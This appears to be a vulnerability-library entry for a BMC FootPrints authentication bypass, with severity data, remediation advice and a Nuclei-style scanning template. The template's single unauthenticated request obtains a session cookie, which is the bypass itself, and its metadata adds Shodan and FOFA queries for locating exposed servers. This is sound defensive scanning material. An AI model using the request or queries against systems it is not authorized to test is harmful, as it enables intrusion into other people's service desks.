/Vulnerability Library

BMC FootPrints - Authentication Bypass

CVE-2025-71257
Verified

Description

BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE).

Severity

Medium

CVSS Score

6.5

Exploit Probability

4%

Affected Product

footprints

Published Date

March 18, 2026

Template Author

watchtowr, dhiyaneshdk

CVE-2025-71257.yaml
id: CVE-2025-71257

info:
  name: BMC FootPrints - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: medium
  description: |
    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE).
  impact: |
    Unauthenticated attackers can bypass access controls to access and modify application data and system resources.
  remediation: |
    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-71257
    epss-score: 0.044
    epss-percentile: 0.90137
    cwe-id: CWE-287
  reference:
    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"/footprints/servicedesk/"
    product: footprints
    vendor: bmc
    fofa-query: body="/footprints/servicedesk/"
  tags: cve,cve2025,servicedesk,bmc-software,auth-bypass,footprints,bmc,vkev

variables:
  string: "{{to_lower(rand_base(8))}}"

http:
  - raw:
      - |
        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: set_cookie
        words:
          - "SEC_TOKEN="
# digest: 4a0a00473045022100f69b7ba9b1a67f0a7b87c572d3034024360b29fcbbbf04aa35ad460ef2637e8c0220626d2259c3289ab02aabd6a3dcf095ce168da269f49b28a3583d62a8bbc39024:922c64590222798bb761d5b6d8e72950
6.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
CVE ID:
cve-2025-71257
CWE ID:
cwe-287

References

https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/

Remediation Steps

Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.